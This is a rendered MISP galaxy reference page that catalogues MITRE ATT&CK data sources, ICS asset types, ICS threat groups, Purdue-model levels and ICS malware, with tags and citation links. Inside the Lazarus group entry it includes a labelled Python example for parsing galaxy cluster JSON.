Links

https://attack.mitre.org/datasources/DS0035

Domain Name - DS0038

Information obtained (commonly through registration or activity logs) regarding one or more IP addresses registered with human readable names (ex: mitre.org)

The tag is: misp-galaxy:mitre-data-source="Domain Name - DS0038"

Table 6856. Table References

Links

https://attack.mitre.org/datasources/DS0038

Firmware - DS0001

Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI

The tag is: misp-galaxy:mitre-data-source="Firmware - DS0001"

Table 6857. Table References

Links

https://attack.mitre.org/datasources/DS0001

Snapshot - DS0020

A point-in-time copy of cloud volumes (files, settings, etc.) that can be created and/or deployed in cloud environments(Citation: Microsoft Snapshot)(Citation: Amazon Snapshots)

The tag is: misp-galaxy:mitre-data-source="Snapshot - DS0020"

Table 6858. Table References

Links

https://attack.mitre.org/datasources/DS0020

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSSnapshots.html

https://docs.microsoft.com/en-us/azure/virtual-machines/linux/snapshot-copy-managed-disk

Instance - DS0030

A virtual server environment which runs workloads, hosted on-premise or by third-party cloud providers(Citation: Amazon VM)(Citation: Google VM)

The tag is: misp-galaxy:mitre-data-source="Instance - DS0030"

Table 6859. Table References

Links

https://attack.mitre.org/datasources/DS0030

https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/

https://cloud.google.com/compute/docs/instances

WMI - DS0005

The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers(Citation: Microsoft WMI System Classes)(Citation: Microsoft WMI Architecture)

The tag is: misp-galaxy:mitre-data-source="WMI - DS0005"

Table 6860. Table References

Links

https://attack.mitre.org/datasources/DS0005

https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture

https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-system-classes

Image - DS0007

A single file used to deploy a virtual machine/bootable disk into an on-premise or third-party cloud environment(Citation: Microsoft Image)(Citation: Amazon AMI)

The tag is: misp-galaxy:mitre-data-source="Image - DS0007"

Table 6861. Table References

Links

https://attack.mitre.org/datasources/DS0007

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html

https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource

Kernel - DS0008

A computer program, at the core of a computer OS, that resides in memory and facilitates interactions between hardware and software components(Citation: STIG Audit Kernel Modules)(Citation: Init Man Page)

The tag is: misp-galaxy:mitre-data-source="Kernel - DS0008"

Table 6862. Table References

Links

https://attack.mitre.org/datasources/DS0008

https://man7.org/linux/man-pages/man2/init_module.2.html

https://www.stigviewer.com/stig/oracle_linux_5/2016-12-20/finding/V-22383

Process - DS0009

Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures(Citation: Microsoft Processes and Threads)

The tag is: misp-galaxy:mitre-data-source="Process - DS0009"

Table 6863. Table References

Links

https://attack.mitre.org/datasources/DS0009

https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads

Module - DS0011

Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries(Citation: Microsoft LoadLibrary)(Citation: Microsoft Module Class)

The tag is: misp-galaxy:mitre-data-source="Module - DS0011"

Table 6864. Table References

Links

https://attack.mitre.org/datasources/DS0011

https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module

https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya

Persona - DS0021

A malicious online profile representing a user commonly used by adversaries to social engineer or otherwise target victims

The tag is: misp-galaxy:mitre-data-source="Persona - DS0021"

Table 6865. Table References

Links

https://attack.mitre.org/datasources/DS0021

Script - DS0012

A file or stream containing a list of commands, allowing them to be launched in sequence(Citation: Microsoft PowerShell Logging)(Citation: FireEye PowerShell Logging)(Citation: Microsoft AMSI)

The tag is: misp-galaxy:mitre-data-source="Script - DS0012"

Table 6866. Table References

Links

https://attack.mitre.org/datasources/DS0012

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7

https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal

https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html

Cluster - DS0031

A set of containerized computing resources that are managed together but have separate nodes to execute various tasks and/or applications(Citation: Kube Cluster Admin)(Citation: Kube Cluster Info)

The tag is: misp-galaxy:mitre-data-source="Cluster - DS0031"

Table 6867. Table References

Links

https://attack.mitre.org/datasources/DS0031

https://kubernetes.io/docs/concepts/cluster-administration/

https://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#cluster-info

Pod - DS0014

A single unit of shared resources within a cluster, comprised of one or more containers(Citation: Kube Kubectl)(Citation: Kube Pod)

The tag is: misp-galaxy:mitre-data-source="Pod - DS0014"

Table 6868. Table References

Links

https://attack.mitre.org/datasources/DS0014

https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.19/#pod-v1-core

https://kubernetes.io/docs/reference/kubectl/kubectl/

Drive - DS0016

A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter(Citation: Sysmon EID 9)

The tag is: misp-galaxy:mitre-data-source="Drive - DS0016"

Table 6869. Table References

Links

https://attack.mitre.org/datasources/DS0016

https://docs.microsoft.com/sysinternals/downloads/sysmon#event-id-9-rawaccessread

Command - DS0017

A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task(Citation: Confluence Linux Command Line)(Citation: Audit OSX)

The tag is: misp-galaxy:mitre-data-source="Command - DS0017"

Table 6870. Table References

Links

https://attack.mitre.org/datasources/DS0017

https://confluence.atlassian.com/confkb/how-to-enable-command-line-audit-logging-in-linux-956166545.html

https://www.scip.ch/en/?labs.20150108

Firewall - DS0018

A network security system, running locally on an endpoint or remotely as a service (ex: cloud environment), that monitors and controls incoming/outgoing network traffic based on predefined rules(Citation: AWS Sec Groups VPC)

The tag is: misp-galaxy:mitre-data-source="Firewall - DS0018"

Table 6871. Table References

Links

https://attack.mitre.org/datasources/DS0018

https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html

Service - DS0019

A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in(Citation: Microsoft Services)(Citation: Linux Services Run Levels)

The tag is: misp-galaxy:mitre-data-source="Service - DS0019"

Table 6872. Table References

Links

https://attack.mitre.org/datasources/DS0019

https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications

https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/

File - DS0022

A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media).(Citation: Microsoft File Mgmt)

The tag is: misp-galaxy:mitre-data-source="File - DS0022"

Table 6873. Table References

Links

https://attack.mitre.org/datasources/DS0022

https://docs.microsoft.com/en-us/windows/win32/fileio/file-management

Container - DS0032

A standard unit of virtualized software that packages up code and all its dependencies so the application runs quickly and reliably from one computing environment to another(Citation: Docker Docs Container)

The tag is: misp-galaxy:mitre-data-source="Container - DS0032"

Table 6874. Table References

Links

https://attack.mitre.org/datasources/DS0032

https://docs.docker.com/engine/api/v1.41/#tag/Container

Driver - DS0027

A computer program that operates or controls a particular type of device that is attached to a computer. It provides a software interface to hardware devices, enabling operating systems and other computer programs to access hardware functions without needing to know precise details about the hardware being used(Citation: IOKit Fundamentals)(Citation: Windows Getting Started Drivers)

The tag is: misp-galaxy:mitre-data-source="Driver - DS0027"

Table 6875. Table References

Links

https://attack.mitre.org/datasources/DS0027

https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html

https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode

Volume - DS0034

Block object storage hosted on-premise or by third-party providers, typically made available to resources as virtualized hard drives(Citation: Amazon S3)(Citation: Azure Blob Storage)(Citation: Google Cloud Storage)

The tag is: misp-galaxy:mitre-data-source="Volume - DS0034"

Table 6876. Table References

Links

https://attack.mitre.org/datasources/DS0034

https://aws.amazon.com/s3/

https://azure.microsoft.com/en-us/services/storage/blobs/

https://cloud.google.com/storage

Group - DS0036

A collection of multiple user accounts that share the same access rights to the computer and/or network resources and have common security rights(Citation: Amazon IAM Groups)

The tag is: misp-galaxy:mitre-data-source="Group - DS0036"

Table 6877. Table References

Links

https://attack.mitre.org/datasources/DS0036

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html

Certificate - DS0037

A digital document, which highlights information such as the owner’s identity, used to instill trust in public keys used while encrypting network communications

The tag is: misp-galaxy:mitre-data-source="Certificate - DS0037"

Table 6878. Table References

Links

https://attack.mitre.org/datasources/DS0037

Assets

A list of asset categories that are commonly found in industrial control systems.

Assets is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Control Server

A device which acts as both a server and controller, that hosts the control software used in communicating with lower-level control devices in an ICS network (e.g. Remote Terminal Units (RTUs) and Programmable Logic Controllers (PLCs)).

The tag is: misp-galaxy:mitre-ics-assets="Control Server"

Table 6879. Table References

Links

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Data Historian

A centralized database located on a computer installed in the control system DMZ supporting external corporate user data access for archival and analysis using statistical process control and other techniques.

The tag is: misp-galaxy:mitre-ics-assets="Data Historian"

Table 6880. Table References

Links

https://ics-cert.us-cert.gov/Secure-Architecture-Design-Definitions

Engineering Workstation

The engineering workstation is usually a high-end, very reliable computing platform designed for configuration, maintenance and diagnostics of the control system applications and other control system equipment. The system is usually made up of redundant hard disk drives, a high-speed network interface, reliable CPUs, performance graphics hardware, and applications that provide configuration and monitoring tools to perform control system application development, compilation and distribution of system modifications.

The tag is: misp-galaxy:mitre-ics-assets="Engineering Workstation"

Table 6881. Table References

Links

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Field Controller/RTU/PLC/IED

Controller terminology depends on the type of system they are associated with. They provide typical processing capabilities. Controllers, sometimes referred to as Remote Terminal Units (RTU) and Programmable Logic Controllers (PLC), are computerized control units that are typically rack or panel mounted with modular processing and interface cards. The units are collocated with the process equipment and interface through input and output modules to the various sensors and controlled devices. Most utilize a programmable logic-based application that provides scanning and writing of data to and from the IO interface modules and communicates with the control system network via various communications methods, including serial and network communications.

The tag is: misp-galaxy:mitre-ics-assets="Field Controller/RTU/PLC/IED"

Table 6882. Table References

Links

https://ics-cert.us-cert.gov/Secure-Architecture-Design-Definitions

http://isa99.isa.org/ISA99%20Wiki/WP-2-1.aspx

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

Human-Machine Interface

In computer science and human-computer interaction, the Human-Machine Interface (HMI) refers to the graphical, textual and auditory information the program presents to the user (operator) using computer monitors and audio subsystems, and the control sequences (such as keystrokes with the computer keyboard, movements of the computer mouse, and selections with the touchscreen) the user employs to control the program. Currently the following types of HMI are the most common: Graphical user interfaces (GUI) accept input via devices such as computer keyboard and mouse and provide articulated graphical output on the computer monitor. Web-based user interfaces accept input and provide output by generating web pages which are transported via the network and viewed by the user using a web browser program. The operations user must be able to control the system and assess the state of the system. Each control system vendor provides a unique look-and-feel to their basic HMI applications. An older, not gender-neutral version of the term is man-machine interface (MMI). The system may expose several user interfaces to serve different kinds of users. User interface screens may be optimized to provide the appropriate information and control interface to operations users, engineering users and management users.

The tag is: misp-galaxy:mitre-ics-assets="Human-Machine Interface"

Table 6883. Table References

Links

https://ics-cert.us-cert.gov/Secure-Architecture-Design-Definitions

http://isa99.isa.org/ISA99%20Wiki/WP-2-1.aspx

Input/Output Server

The Input/Output (I/O) server provides the interface between the control system LAN applications and the field equipment monitored and controlled by the control system applications. The I/O server, sometimes referred to as a Front-End Processor (FEP) or Data Acquisition Server (DAS), converts the control system application data into packets that are transmitted over various types of communications media to the end device locations. The I/O server also converts data received from the various end devices over different communications mediums into data formatted to communicate with the control system networked applications.

The tag is: misp-galaxy:mitre-ics-assets="Input/Output Server"

Table 6884. Table References

Links

https://ics-cert.us-cert.gov/Secure-Architecture-Design-Definitions

Safety Instrumented System/Protection Relay

A safety instrumented system (SIS) takes automated action to keep a plant in a safe state, or to put it into a safe state, when abnormal conditions are present. The SIS may implement a single function or multiple functions to protect against various process hazards in your plant. The function of protective relaying is to cause the prompt removal from service of an element of a power system when it suffers a short circuit or when it starts to operate in any abnormal manner that might cause damage or otherwise interfere with the effective operation of the rest of the system.

The tag is: misp-galaxy:mitre-ics-assets="Safety Instrumented System/Protection Relay"

Table 6885. Table References

Links

http://sache.org/beacon/files/2009/07/en/read/2009-07-Beacon-s.pdf

http://www.gegridsolutions.com/multilin/notes/artsci/artsci.pdf

Groups

Groups are sets of related intrusion activity that are tracked by a common name in the security community. Groups are also sometimes referred to as campaigns or intrusion sets. Some groups have multiple names associated with the same set of activities due to various organizations tracking the same set of activities by different names. Groups are mapped to publicly reported technique use and referenced in the ATT&CK for ICS knowledge base. Groups are also mapped to reported software used during intrusions.

Groups is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

ALLANITE

ALLANITE is a suspected Russian cyber espionage group that has primarily targeted the electric utility sector within the United States and United Kingdom. The group’s tactics and techniques are reportedly similar to Dragonfly / Dragonfly 2.0, although ALLANITE’s technical capabilities have not exhibited disruptive or destructive abilities. It has been suggested that the group maintains a presence in ICS for the purpose of gaining understanding of processes and to maintain persistence.

The tag is: misp-galaxy:mitre-ics-groups="ALLANITE"

ALLANITE has relationships with:

  • similar: misp-galaxy:threat-actor="ALLANITE" with estimative-language:likelihood-probability="almost-certain"

Table 6886. Table References

Links

https://dragos.com/resource/allanite/

https://www.us-cert.gov/ncas/alerts/TA17-293A

https://www.securityweek.com/allanite-group-targets-ics-networks-electric-utilities-us-uk

https://www.eisac.com/public-news-detail?id=115909

APT33

APT33 is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors.

The tag is: misp-galaxy:mitre-ics-groups="APT33"

APT33 has relationships with:

  • similar: misp-galaxy:threat-actor="APT33" with estimative-language:likelihood-probability="almost-certain"

Table 6887. Table References

Links

https://attack.mitre.org/groups/G0064/

https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html

https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

https://dragos.com/resource/magnallium/

https://www.wired.com/story/iran-hackers-us-phishing-tensions/

https://www.symantec.com/security-center/writeup/2017-030708-4403-99

Dragonfly

Dragonfly is a cyber espionage group that has been active since at least 2011. They initially targeted defense and aviation companies but shifted to focus on the energy sector in early 2013. They have also targeted companies related to industrial control systems. A similar group emerged in 2015 and was identified by Symantec as Dragonfly 2.0. There is debate over the extent of the overlap between Dragonfly and Dragonfly 2.0, but there is sufficient evidence to lead to these being tracked as two separate groups.

The tag is: misp-galaxy:mitre-ics-groups="Dragonfly"

Table 6888. Table References

Links

https://attack.mitre.org/groups/G0035/

https://dragos.com/resource/dymalloy/

https://www.us-cert.gov/ncas/alerts/TA17-293A

http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf

https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group

Dragonfly 2.0

Dragonfly 2.0 is a suspected Russian threat group which has been active since at least late 2015. Dragonfly 2.0’s initial reported targets were a part of the energy sector, located within the United States, Switzerland, and Turkey. There is debate over the extent of overlap between Dragonfly 2.0 and Dragonfly, but there is sufficient evidence to lead to these being tracked as two separate groups.

The tag is: misp-galaxy:mitre-ics-groups="Dragonfly 2.0"

Table 6889. Table References

Links

https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group

https://fortune.com/2017/09/06/hack-energy-grid-symantec/

https://dragos.com/resource/dymalloy/

https://blog.talosintelligence.com/2017/07/template-injection.html

https://dragos.com/wp-content/uploads/Sample-WorldView-Report.pdf

https://dragos.com/wp-content/uploads/yir-ics-activity-groups-threat-landscape-2018.pdf

HEXANE

HEXANE is a threat group that has targeted ICS organizations within the oil & gas and telecommunications sectors. Many of the targeted organizations have been located in the Middle East, including Kuwait. HEXANE’s targeting of telecommunications has been speculated to be part of an effort to establish man-in-the-middle capabilities throughout the region. HEXANE’s TTPs appear similar to APT33 and OilRig, but due to differences in victims and tools it is tracked as a separate entity.

The tag is: misp-galaxy:mitre-ics-groups="HEXANE"

Table 6890. Table References

Links

https://dragos.com/resource/hexane/

https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign

https://www.securityweek.com/researchers-analyze-tools-used-hexane-attackers-against-industrial-firms

https://www.bankinfosecurity.com/lyceum-apt-group-new-threat-to-oil-gas-companies-a-13003

Lazarus group

Lazarus group is a suspected North Korean adversary group that has targeted networks associated with civilian electric energy in Europe, East Asia, and North America. Links have been established associating this group with the WannaCry ransomware from 2017. While WannaCry was not an ICS focused attack, Lazarus group is considered to be a threat to ICS. North Korean group definitions are known to have significant overlap, and the name Lazarus Group is known to encompass a broad range of activity. Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea. Some organizations track North Korean clusters or groups such as Bluenoroff, APT37, and APT38 separately, while other organizations may track some activity associated with those group names by the name Lazarus Group.

The tag is: misp-galaxy:mitre-ics-groups="Lazarus group"

Lazarus group has relationships with:

  • similar: misp-galaxy:threat-actor="Lazarus Group" with estimative-language:likelihood-probability="almost-certain"
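
Every entry in this document is rendered from the galaxy cluster JSON named in its section header: the tag is `misp-galaxy:<cluster type>="<value>"`, and a "has relationships with" line comes from the entry's `related` list, whose `dest-uuid` points at a value in another galaxy (here the generic threat-actor galaxy) and whose `tags` carry the estimative-language qualifier. As an added example, not code from the MISP project or its document generator, the Python below reads such cluster files and derives those lines. The two clusters embedded in it are constructed for the example and their UUIDs are made up; the field names (`type`, `values`, `value`, `uuid`, `meta.refs`, `related`, `dest-uuid`, `tags`) are the ones the real misp-galaxy cluster files use.

```python
"""Parse MISP galaxy cluster JSON and derive the tags this document prints.

Added example, not code from the MISP project. The two clusters below are
constructed for the example (made-up UUIDs); field names follow the real
misp-galaxy cluster schema.
"""
import json

SAMPLE_ICS_GROUPS = json.dumps({
    "name": "ICS Groups",
    "type": "mitre-ics-groups",
    "values": [
        {
            "value": "Lazarus group",
            "uuid": "11111111-1111-4111-8111-111111111111",
            "description": "Suspected North Korean group (constructed summary).",
            "meta": {"refs": ["https://www.us-cert.gov/ncas/alerts/TA17-132A"]},
            "related": [{
                "dest-uuid": "22222222-2222-4222-8222-222222222222",
                "type": "similar",
                "tags": ['estimative-language:likelihood-probability="almost-certain"'],
            }],
        },
        {
            "value": "Leafminer",
            "uuid": "33333333-3333-4333-8333-333333333333",
            "description": "Group without ICS-specific capability (constructed summary).",
            "meta": {"refs": []},
        },
    ],
})

# Stands in for the generic threat-actor galaxy that the 'related' link targets.
SAMPLE_THREAT_ACTORS = json.dumps({
    "name": "Threat Actor",
    "type": "threat-actor",
    "values": [{"value": "Lazarus Group",
                "uuid": "22222222-2222-4222-8222-222222222222"}],
})


def load_cluster(text: str) -> dict:
    """Parse one cluster document and check the keys the functions below rely on."""
    cluster = json.loads(text)
    for key in ("type", "values"):
        if key not in cluster:
            raise ValueError(f"cluster is missing required key {key!r}")
    return cluster


def galaxy_tag(cluster_type: str, value: str) -> str:
    """Build the MISP tag for a cluster value, e.g. misp-galaxy:mitre-ics-groups="Sandworm"."""
    # Tag values are double-quoted; a value containing '"' would need escaping
    # rules we do not want to guess at, so it is rejected instead.
    if '"' in value:
        raise ValueError("cluster value must not contain a double quote")
    return f'misp-galaxy:{cluster_type}="{value}"'


def index_by_uuid(*clusters: dict) -> dict:
    """Map every value UUID to (cluster type, value) so 'related' links can be resolved."""
    return {entry["uuid"]: (cluster["type"], entry["value"])
            for cluster in clusters for entry in cluster["values"]}


def relationships(entry: dict, uuid_index: dict) -> list:
    """Render an entry's 'related' links in the form this document prints them."""
    lines = []
    for rel in entry.get("related", []):
        dest = uuid_index.get(rel["dest-uuid"])
        # Keep the raw UUID when the target galaxy was not loaded, rather than drop the link.
        target = galaxy_tag(*dest) if dest else rel["dest-uuid"]
        line = f'{rel["type"]}: {target}'
        if rel.get("tags"):
            line += " with " + ", ".join(rel["tags"])
        lines.append(line)
    return lines


def render_entry(entry: dict, cluster_type: str, uuid_index: dict) -> str:
    """Produce the plain-text block this document uses for one cluster value."""
    parts = [entry["value"], "", entry.get("description", "").strip(), "",
             "The tag is: " + galaxy_tag(cluster_type, entry["value"])]
    rels = relationships(entry, uuid_index)
    if rels:
        parts += ["", f"{entry['value']} has relationships with:", ""]
        parts += ["  • " + r for r in rels]
    refs = entry.get("meta", {}).get("refs", [])
    if refs:
        parts += ["", "Links", ""] + refs
    return "\n".join(parts)


if __name__ == "__main__":
    ics = load_cluster(SAMPLE_ICS_GROUPS)
    index = index_by_uuid(ics, load_cluster(SAMPLE_THREAT_ACTORS))
    for entry in ics["values"]:
        print(render_entry(entry, ics["type"], index), end="\n\n")
```

Resolving `dest-uuid` requires loading every galaxy the relationships point into; the fallback keeps the bare UUID visible so an unresolved link is noticed rather than silently lost.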

Table 6891. Table References

Links

https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity

https://dragos.com/resource/covellite/

https://www.us-cert.gov/ncas/alerts/TA17-132A

https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf

https://www.us-cert.gov/ncas/alerts/TA17-164A

https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/

https://www.securityweek.com/five-threat-groups-target-industrial-systems-dragos

https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group

Leafminer

Leafminer is a threat group that has targeted Saudi Arabia, Japan, Europe and the United States. Within the US, Leafminer has targeted electric utilities, focusing on gaining initial access into those organizations. Reporting indicates that Leafminer has not demonstrated ICS-specific or destructive capabilities.

The tag is: misp-galaxy:mitre-ics-groups="Leafminer"

Table 6892. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east

https://dragos.com/resource/raspite/

OilRig

OilRig is a suspected Iranian threat group that has targeted the financial, government, energy, chemical, and telecommunication sectors, as well as the petrochemical and oil & gas industries. OilRig has been observed operating in Iraq, Pakistan, Israel, and the UK, and has been linked to the 2012 Shamoon attacks on Saudi Aramco.

The tag is: misp-galaxy:mitre-ics-groups="OilRig"

OilRig has relationships with:

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="almost-certain"

Table 6893. Table References

Links

https://www.fireeye.com/current-threats/apt-groups.html#apt34

https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html

https://dragos.com/resource/chrysene/

https://unit42.paloaltonetworks.com/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/

https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/

https://www.cyberviser.com/2018/05/group-linked-to-shamoon-attacks-targeting-ics-networks-in-middle-east-and-uk/

Sandworm

Sandworm is a threat group associated with the attack on an electrical transmission substation near Kiev, Ukraine, which disrupted electric grid operations on December 17, 2016. Sandworm has been cited as the author of the Industroyer malware used in that attack.

The tag is: misp-galaxy:mitre-ics-groups="Sandworm"

Sandworm has relationships with:

  • similar: misp-galaxy:threat-actor="Sandworm" with estimative-language:likelihood-probability="almost-certain"

Table 6894. Table References

Links

https://dragos.com/resource/electrum/

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

https://dragos.com/blog/crashoverride/CrashOverride-01.pdf

https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html

https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B

https://www.us-cert.gov/ics/advisories/ICSA-11-094-02B

https://dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf

https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/

https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/

XENOTIME

XENOTIME is a threat group that has targeted and compromised industrial systems, specifically safety instrumented systems that are designed to provide safety and protective functions. XENOTIME has previously targeted the oil & gas and electric sectors within the Middle East, Europe, and North America. XENOTIME has also been reported to target ICS vendors, manufacturers, and organizations in the Middle East. This group is one of the few with reported destructive capabilities.

The tag is: misp-galaxy:mitre-ics-groups="XENOTIME"

Table 6895. Table References

Links

https://dragos.com/resource/xenotime/

https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html

https://www.cyberscoop.com/xenotime-ics-cyber-attacks-trisis-dragos/

https://dragos.com/blog/trisis/TRISIS-01.pdf

https://dragos.com/wp-content/uploads/Dragos-Oil-and-Gas-Threat-Perspective-2019.pdf

Levels

Based on the Purdue Model to aid ATT&CK for ICS users to understand which techniques are applicable to their environment.

Levels is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Level 0

The I/O network level includes the actual physical processes and sensors and actuators that are directly connected to process equipment.

The tag is: misp-galaxy:mitre-ics-levels="Level 0"

Level 1

The control network level includes the functions involved in sensing and manipulating physical processes. Typical devices at this level are programmable logic controllers (PLCs), distributed control systems, safety instrumented systems and remote terminal units (RTUs).

The tag is: misp-galaxy:mitre-ics-levels="Level 1"

Level 2

The supervisory control LAN level includes the functions involved in monitoring and controlling physical processes and the general deployment of systems such as human-machine interfaces (HMIs), engineering workstations and historians.

The tag is: misp-galaxy:mitre-ics-levels="Level 2"

Software

Software is a generic term for custom or commercial code, operating system utilities, open-source software, or other tools used to conduct behavior modeled in ATT&CK for ICS.

Software is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

ACAD/Medre.A

ACAD/Medre.A is a worm that steals operational information. The worm collects AutoCAD files with drawings. ACAD/Medre.A has the capability to be used for industrial espionage.

The tag is: misp-galaxy:mitre-ics-software="ACAD/Medre.A"

Table 6896. Table References

Links

Backdoor.Oldrea, Havex

Backdoor.Oldrea is a Remote Access Trojan (RAT) that communicates with a Command and Control (C2) server. The C2 server can deploy payloads that provide additional functionality. One payload has been identified and analyzed that enumerates all connected network resources, such as computers or shared resources, and uses the classic DCOM-based (Distributed Component Object Model) version of the Open Platform Communications (OPC) standard to gather information about connected control system devices and resources within the network.

The tag is: misp-galaxy:mitre-ics-software="Backdoor.Oldrea, Havex"

Table 6897. Table References

Links

https://ics-cert.us-cert.gov/advisories/ICSA-14-178-01

https://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-176-02A

https://www.f-secure.com/weblog/archives/00002718.html

https://pdfs.semanticscholar.org/18df/43ef1690b0fae15a36f770001160aefbc6c5.pdf

https://www.fireeye.com/blog/threat-research/2014/07/havex-its-down-with-opc.html

https://www.symantec.com/connect/blogs/dragonfly-western-energy-companies-under-sabotage-threat

https://www.youtube.com/watch?v=eywmb7UDODY&feature=youtu.be&t=939

https://www.sans.org/reading-room/whitepapers/ICS/impact-dragonfly-malware-industrial-control-systems-36672

Bad Rabbit, Diskcoder.D

Bad Rabbit is a self-propagating (“wormable”) ransomware that affected the transportation sector in Ukraine.

The tag is: misp-galaxy:mitre-ics-software="Bad Rabbit, Diskcoder.D"

Table 6898. Table References

Links

https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/

https://securelist.com/bad-rabbit-ransomware/82851/

https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/

BlackEnergy 3

BlackEnergy 3 is a malware toolkit that has been used by both criminal and APT actors. It supports various plug-ins, including a variant of KillDisk. It is known to have been used against the Ukrainian power grid.

The tag is: misp-galaxy:mitre-ics-software="BlackEnergy 3"

Table 6899. Table References

Links

https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf

Conficker

Conficker is a computer worm that targets Microsoft Windows and was first detected in November 2008. It exploits a vulnerability in Windows (MS08-067) and uses dictionary attacks against administrator passwords to propagate while forming a botnet. Conficker made its way onto computers and removable disk drives in a nuclear power plant.

The tag is: misp-galaxy:mitre-ics-software="Conficker"

Table 6900. Table References

Links

https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml

Duqu

Duqu is a collection of computer malware discovered in 2011. It is reportedly related to the Stuxnet worm, although Duqu is not self-replicating.

The tag is: misp-galaxy:mitre-ics-software="Duqu"

Table 6901. Table References

Links

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf

Flame

Flame is an attacker-instructed worm which may open a backdoor and steal information from a compromised computer. Flame has the capability to be used for industrial espionage.

The tag is: misp-galaxy:mitre-ics-software="Flame"

Table 6902. Table References

Links

https://www.symantec.com/security-center/writeup/2012-052811-0308-99

https://www.welivesecurity.com/2012/07/20/flame-in-depth-code-analysis-of-mssecmgr-ocx/

https://www.fireeye.com/blog/threat-research/2012/05/flamerskywiper-analysis.html

Industroyer

Industroyer is a sophisticated piece of malware designed to cause an Impact to the working processes of Industrial Control Systems (ICS), specifically ICSs used in electrical substations. Industroyer was alleged to be used in the attacks on the Ukrainian power grid in December 2016.

The tag is: misp-galaxy:mitre-ics-software="Industroyer"

Table 6903. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf

